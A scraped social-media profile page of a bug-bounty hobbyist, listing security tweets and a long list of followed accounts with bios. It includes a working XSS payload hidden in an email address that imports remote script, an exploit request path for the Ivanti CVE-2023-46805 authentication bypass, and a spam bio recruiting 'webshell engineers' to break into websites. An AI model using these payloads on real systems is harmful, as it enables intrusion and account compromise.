Mukesh Kumar @mukeshrishu
a newbie in bug hunting..:D India Joined May 2011-
Tweets879
-
Followers61
-
Following979
-
Likes1K
Made a simple dashboard to help track/search CVEs and security vulnerabilities in near real-time. No fancy stuff - just a clean interface to see what's burning in the security world right now. (it's Ivanti🙈) huntdb.com/cve/CVE-2025-0…) huntdb.com Feedback welcome!
All my current bug bounty knowledge is gone. Here's how I get it back and make $100k in the first year: First, I've got to learn the basics. For this, I will make sure I understand at a high level how the components I'm working with function. I'll need to understand...
⚠️ Giveaway ⚠️ Want to learn modern reconnaissance and hacking skills? Join The Bug Hunter's Methodology Cohort 5! October 2nd, 3rd, 4th - jhaddix.gumroad.com/l/kihwd Like and retweet this post for a chance to win a free seat! Five winners will be announced on Sept 1st!
⚠️"Attacking Organizations with Big Scope - from 0 to Hero" was my talk at #HitBxPhdays in Bangkok 🇹🇭. Happy to share the slides and recording with the community. 🔴 Slides: drive.google.com/file/d/1bALcKL… 🔴 Recording: youtu.be/vFk0XtHfuSg?si… Enjoy! #bugbounty #infosec…
Released as part of #NahamCon, an SQL injection cheatsheet like no other: tib3rius.com/sqli I'll be updating it soon with more examples, but it covers so much useful info! Thanks @NahamSec for inviting me to do an SQLi workshop!
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@YourDomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
Check out my new blog post: Port Scanning for Bug Bounties buff.ly/44bQPC9 #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
Let’s made something new Let’s keep this tweet for question’s You can ask me here in a comment and will answers in a comment , and let’s everyone learn and found some useful questions/answers keep this tweet as reference by re-tweet #bugbounty #bugbountytips #questions ✌️
🚨 Do you want extended version of this article Edition 2024 How to JS for Pentest & Bug Bounties : Edition 2023 kongsec.medium.com/how-to-js-for-… #bugbounty #bughunting #hackerone #bugcrowd
You're probably directory brute-forcing wrong. You should be methodical when targeting frameworks such as Express, Rails, Flask, Django, etc. 2/ By default, ffuf uses the GET HTTP method. You should be fuzzing with different HTTP methods. Try using a wordlist multiple times…
How anyone could've accessed vulnerability reports sent to a $40B+ company:
You can find easy critical vulnerabilities. It just takes finding unique attack surfaces. Here's an example of how you can, using a story of how I hacked a car company:
The easiest way to find a max-impact desync vulnerability in 2024: 1. Create a novel desync technique 2. Add it to a tool like HTTP Request Smuggler 3. Scan a bunch of systems and see what sticks. The only tricky step is #1 and there's a new tool to help with this 1/2
If you're looking to fine-tune your detections for the authentication bypass for Ivanti Pulse Connect Secure (CVE-2023-46805), the best way is to send a POST request to /api/v1/totp/user-backup-code/../../system/platform?operation=testConnectivity If the response has…
Testing for DNS Rebinding attacks evading strict SSRF filters? 😎 rbndr is a simple DNS server that you can set up to help you test for rebinding attacks by sending 2 different subsequent responses to incoming DNS requests! 😎 Check it out on Github! 👇 github.com/taviso/rbndr
This awesome 'FFuf Advanced Tricks' article by @noraj_rawsec needs a shoutout. I created my own FFuf script based on his tricks, and here is the result. #BugBounty acceis.fr/ffuf-advanced-…

Genevieve Carter @GenevieveC49511
54 Followers 3K Following
Carmen Smith @CarmenSmit96279
5 Followers 174 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/dyHzQnFVPL
Ascencion Fidel @fidel_asce49930
12 Followers 114 Following 🚀 Yeni Envanter Topluluğumuza katılın! Ücretsiz borsa tüyoları, piyasa analizi, yatırım stratejileri ve risk yönetimi için WhatsApp'ı ekleyin!
Aaron Guo @aaronguostudio
71 Followers 1K Following
Monstar @Monstar850883
106 Followers 5K Following
Gamiel Manbiotan @oscuridad1010
127 Followers 528 Following Offensive Security | Red Team Operations | H.O.F NASA, United Nations, U.S DoD | CRTP | CNPEN | CAPENX | CAPEN | CRTA https://t.co/hPhjiFw6N6
Krish Praveen @KrishPraveen17
13 Followers 382 Following
Deandra @DeandraSec
763 Followers 4K Following Security Researcher | Bug Bounty🎯, Web&Mobile Apps Security | Red Team🔥 | Offensive Security
Jacky Joshi @JackyJoshi4
2 Followers 14 Following chief editor at a leading prakashan kendra...Ahmedabad
Gawasharks @gawasharks
196 Followers 2K Following
Nishesh Kumar sinha @sinhanishesh
26 Followers 58 Following School Principal by profession a staunch follower of Chanakya believing in the philosophy of kingmakers
I_am_Bishal @C15C01337
1K Followers 3K Following Security Research Engineer 💂 Founder of CTF Team: Hack@Sec 🇳🇵 Crypto and Web w/@hackasec 🕸️ Blackhat MEA 2023/24/25 CTF Finalist 🎩 BBH at Hacker0x01 🐞🇳🇵
Sagar Kumar @SagarKu83282750
4 Followers 72 Following devoting myself for the welfare of human & enviornment and for the goodwill of future generation.
Nisheeth @iamnisheeth
13 Followers 103 Following A small cog in nation building, driven by love for science, music ,philosophy, hyperloop, KALI, thumri, bhairava, marshmallow et al in no order of precedence
Chris Hanlon @ChrisHanlonCA
17K Followers 18K Following Security Engineer Google Security Hall of Fame Presenter & Workshop host at #BSidesLV and #DEFCON
g @_l_l_l_l_l_01
390 Followers 5K Following
Alex khan @FedeMadoery
276 Followers 2K Following
Shakeel @IMShak
962 Followers 5K Following CyberSecurity Ninja, Entrepreneur, Speaker, & Semi-Pro Photographer
HackerOnSecurity @hackeronsec
791 Followers 2K Following 14 y/o | Ethical Hacker | Student | British
wolfSSL Embedded SSL/... @wolfSSL
10K Followers 6K Following The most popular open source, embedded TLS. Active in #IoTSecurity, #Avionics, #Automotive & more. Over 5B connections secured! #TLS13 #SecureYourConnectivity
Ariel Garcia @Arl_rose
6K Followers 3K Following Community Builder. Pentester. Bug bounty Hunter. Bug bounty village @ DEFCON. https://t.co/PojmVAcqXQ Tweets are my own and not the views of my employer.
/dev/random @0xDezzy
3K Followers 5K Following 🏴☠️ Dallas based security consultant | Anti-Social Social Engineer | High Tech Low Life | 🜏 My views are my own 𖤐
Henry Carter @henrycatersmith
5K Followers 6K Following Passionate about #tech, #datastorage, #AI, & #dataprotection services. Always looking to learn new about #Technology and invent something better for the world.
PajamaCon @pajamacon
936 Followers 2K Following An DEFCON Pajama party with lightning talks, training, and games.
Rajat @ansh02855096
1 Followers 17 Following
P4nda! @InfoSecP4nda
396 Followers 253 Following Software developer. Former entrepreneur. Part time bug bounty hunter. All views my own.
Terry Conway @Jibbsec
638 Followers 3K Following Dad, Nerd, OSCP, Security Engineer, Finder of Broken Things Sometimes!
~/☁ @0x63456c61
554 Followers 235 Following
Phillip Wylie @PhillipWylie
52K Followers 20K Following xIoT Security Evangelist @phosphorusinc | Offensive Security Expert | Phillip Wylie Show Podcast Host @thehackermaker | @pentesterblue coauthor
RedTeamVillage @RedTeamVillage_
36K Followers 2K Following Red Team Village | Join us on https://t.co/ILZhRFw4Y7 . Check our next events at: https://t.co/fJwIUSTI16
PortcullisLabs @portcullislabs
2K Followers 4K Following Portcullis Labs is the R&D arm of @cisco's Security Advisory team in EMEA. Follow our journey at https://t.co/BIbV67locX.
Tim Brown @timb_machine
3K Followers 5K Following push(@twitter, 'Adversarial Engineer'); # i tweet in Perl
Andy Mike @w_aritas_io
821 Followers 5K Following Orwellian Thinker :: Early D3F ¢ ON :: $HODLER :: Financial Technical Analyst :: & MCompSci @ Oxford
Alibaba Security Resp... @AsrcSecurity
4K Followers 3K Following Alibaba Security Response Center (ASRC), Point of Contact of all the Alibaba related vulnerabilities, cooperations, and so on.
Swaroop Yermalkar �... @swaroopsy
3K Followers 2K Following Head of Cyber Security (Red Team) | OWASP iGoat Project Lead (https://t.co/agfAGIomWH) | Author | Speaker | OSCE | CREST Certified | All tweets are personal!
ΜΔDΞRΔS @hackermaderas
22K Followers 14K Following Home of #CyberpunkisNow. Hacker, researcher, writer, creating original #Technology #InfoSec #OSINT #Privacy content & analysis.
bc1qwr30ddc04zqp878c0... @idontkn85445458
657 Followers 3K Following cmljayByb2xsaW5nIGF0IHlvdXIgbW9tJ3MgaG91c2U=
Mutley @Th3Mutley
359 Followers 482 Following Most of my time on car hacking , AV and EV projects. AFOL , cabinetmaking , cats and cabin for the time left.
Bounty Security @BountySecurity
19K Followers 10K Following Offensive Web Application Security Software
Shammah Agwor⚡️ @Zealsham
3K Followers 3K Following FOSS #Bitcoin |The man of mankind | #BugBounty | Appsec | | Rustacean #Rust |#Btrust Progeny
KRISHNAMOORTHY @krishnamcame
14 Followers 295 Following
ishan chatterjee @ishanchatterj11
6 Followers 47 Following
xss0r @xss0r
6K Followers 3K Following xss0r Deploying an alert box in a web app is like having a tiny pop-up comedian shout 'Surprise!' whenever you least expect it! #xss0r #ibrahimXSS #Blindxss0r
Abdullah Nawaf (Hacke... @XHackerx007
8K Followers 419 Following Hackerx007 Bug hunter FB/Twitter/Mail.ru HOF 41 Bugcrowd rank 11 Bugcrowd P1 rank with 226 p1 :) In love with P1 ;)
𝚖𝚎𝚛𝚝 🦧 @mertistaken
8K Followers 488 Following mert tasci, bug bounty hunter, all-time rank#1 on critical/high submissions https://t.co/djEccIleby
Bug Bounty Village @BugBountyDEFCON
8K Followers 579 Following Official X account for the Bug Bounty Village @DEFCON. Founded by @infinitelogins and @arl_rose.
Dark Web Intelligence @DailyDarkWeb
139K Followers 0 Following Daily Dark Web dose from the dark side.
Clint Gibler @clintgibler
22K Followers 563 Following 🗡️ Head of Security Research @semgrep 📚 Creator of https://t.co/xwtIAI0CuJ newsletter
Netsec Explained @GTKlondike
1K Followers 496 Following I'm a senior security consultant who makes videos to level up my team on AI, pentesting, and bug bounty. Check out my channel on YouTube.
@ddǝɐuɐp @DanaEpp
4K Followers 225 Following I help builders and breakers of code learn to find security vulnerabilities in their apps and APIs.
PentestGPT @PentestGPT
22K Followers 0 Following AI-Powered Penetration Testing Assistant for offensive security testing, focused on web applications and network penetration testing.
Nick Aleks @Nick_Aleks
3K Followers 298 Following Hacker | Engineer | Author of Black Hat GraphQL & Black Hat Bash | DC416 Founder
Ankita Dhakar @expankita
5K Followers 280 Following Co-Founder and CEO @capturethebugs | Managing Director @security_lit | Cybersecurity enthusiast 🥷 Building AI-powered Vulnerability Intelligence Platform 🇳🇿
Ravindra Lakhara 🇮... @RootxRavi
5K Followers 531 Following CREST CPSA & CRT | OSCP | CRTA | CRTP | eJPT | eCPPTv2 | eWPTX | eMAPT | Yogosha 20 | Bugcrowd 200 | Open for freelance project
BuddoBot @BuddoBot
2K Followers 119 Following Safeguarding our nation’s most critical systems through offensive cybersecurity. 🛡️ Is your defense ready?
Lupin @0xLupin
17K Followers 682 Following Roni Carta alias Lupin. Co-Founder of Lupin & Holmes. R&D. Red Teamer. Bug Hunter. Musician 🤘
Jayesh Madnani @Jayesh25_
14K Followers 470 Following CEO and Hacker in charge @ EIS | HackerOne Top 10 | https://t.co/JSX03WutFN
Ashish Dhone @ashketchum_16
3K Followers 140 Following Top Hacker’s Ranking in World | Best Bug Hunter @Microsoft MVR 2023 2024 & 2025 @Apple 2022 @Google 2021 & 300+ Top Companies | CTF Player | Public Speaker 🇮🇳
Mohammad G @BigGhasemi
2K Followers 113 Following My unmatched perspicacity coupled with sheer indefatigability makes me a feared opponent in any realm of human endeavour.
Mohd Waseyuddin @waseyuddin
3K Followers 461 Following Data Engineer, Security Researcher and Bugbounty Hunter
🐞Sara Badran @SaraBadran18
8K Followers 100 Following #bugbounty hunter / penetration tester , gamer 🎮 eWAPTX / eWAPT / eJPT 💻
Amazon India @amazonIN
2.5M Followers 0 Following The official Twitter profile of https://t.co/xHtunc8Tcp
Ninad Mishra @NinadMishra5
6K Followers 669 Following Previously ethically hacked Google, Likedin, Twitter, Paytm, Redhat, Oracle, Apple https://t.co/xU23c1Rs3s
Godfather Orwa 🇯�... @GodfatherOrwa
25K Followers 2K Following Hacker | Bug Hunter | Cooker | Top 5 P1 Warrior On https://t.co/dzFQH75OWj | LevelUpX Champion | 10+ 0Days/CVEs
TESS @ArmanSameer95
7K Followers 936 Following Application Security Researcher https://t.co/g0QPLb24tI | https://t.co/XuUMBUWl0x | Most Valuable Hacker 2022 thanks to @bugcrowd | ex @pdiscoveryio
Kanhaiya Sharma 🇮�... @krishnsec
18K Followers 562 Following Hacker | Top 25 @Bugcrowd all-time | MVP | Top 15 P1-warrior
Pew @TheGrandPew
3K Followers 627 Following Defying Logic. BlackHat US 2022 & Defcon 30 Speaker. Pwn2own Winner 2024, 2025.![[Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!](https://pbs.twimg.com/profile_images/1176789748322643968/bEReriMR.jpg)
Ahsan Khan @hunter0x7
34K Followers 1K Following [Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!
Hussam Linux @HussamLinux
618 Followers 3K Following
Bug Bounty Reports Ex... @gregxsunday
53K Followers 615 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
ROHSEC @rohsec
7K Followers 173 Following Bug Bounty Hunter | @Hacker0x01 Ambassador | Behind - @h1disclosed
mgeeky | Mariusz Bana... @mariuszbit
14K Followers 815 Following 🔴 Operator, Initial Access afficionado, Researcher, ex-AV engine developer, ex-Malware analyst 🦋 @mgeeky.bsky.social 🫖 green tea lover
PHYR3WALL 🇺🇲 @phyr3wall
2K Followers 838 Following Security Stuff @ Microsoft || Red Team Operator || Founder @ https://t.co/skjEVTiYF8 || BB/SRT @ Synack Red Team || Opinions and tweets are my own
Black Hills Informati... @BHinfoSecurity
48K Followers 2K Following Specializing in pen testing, red teaming, and Active SOC. We share our knowledge through blogs, webcasts, open-source tools, and Backdoors & Breaches game.
Vulmon @vulmoncom
2K Followers 2 Following Vulnerability Intelligence Search Engine https://t.co/nxqvEXUxMU Offical Account | Follow @VulmonFeeds for vulnerability feed
Proofpoint @proofpoint
31K Followers 2K Following Protect people. Defend data. Mitigate human risk. Follow @threatinsight for updates on the threat landscape.
Bogdan Tcaciuc @bogdantcaciuc7
8K Followers 168 Following
Sergey Bobrov @Black2Fan
7K Followers 396 Following
I¯\_(ツ)_/¯I \ (�... @BountyOverflow
7K Followers 1K Following BBH ( ͡° ͜ʖ ͡°) 💰 @Bugcrowd Top 50 \o/ ✌️ MVP✌️ I am here to learn/share application security stuff ✌️ I enjoy finding auth bypass bugs 🐞
Austin Sturm @AustinSturm
839 Followers 332 Following [email protected] || Breaker of all the things || Hack@UCF || IRC @astor || @awscloud Straight crowding - Bounty mgr || My own opinions
张惠倩 @momika233
18K Followers 221 Following Anda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!! If you have any questions, please contact me https://t.co/MkzsavUU9V
Neeraj Sharma @root_n33r4j
5K Followers 98 Following
Snapsec @snap_sec
3K Followers 0 Following All Your Cybersecurity Needs Centralized at One Place. Detect, Manage, and Remediate Vulnerabilities with Cutting-Edge Solutions.
iFixit @iFixit
129K Followers 1K Following 🧑🔧 Free repair guides for every thing, written by everyone 📸 Share your repair with #ifixit 🌏 In Europe and Asia: @ifixitDE + @ifixitFR + @iFixit_Japan
Mohsin Khan @tabaahi_
18K Followers 341 Following
Joe Levy @chiesennegs
1K Followers 5K Following First, do no harm. Then protect. Then fail with grace. CEO @sophos @[email protected]
Save to Notion @SaveToNotion
216K Followers 2 Following I save your favorite Tweets and Threads to your Notion Workspace! Just follow @SaveToNotion & check the pinned tweet to start, Developed by: @Abdulhade_Ahmad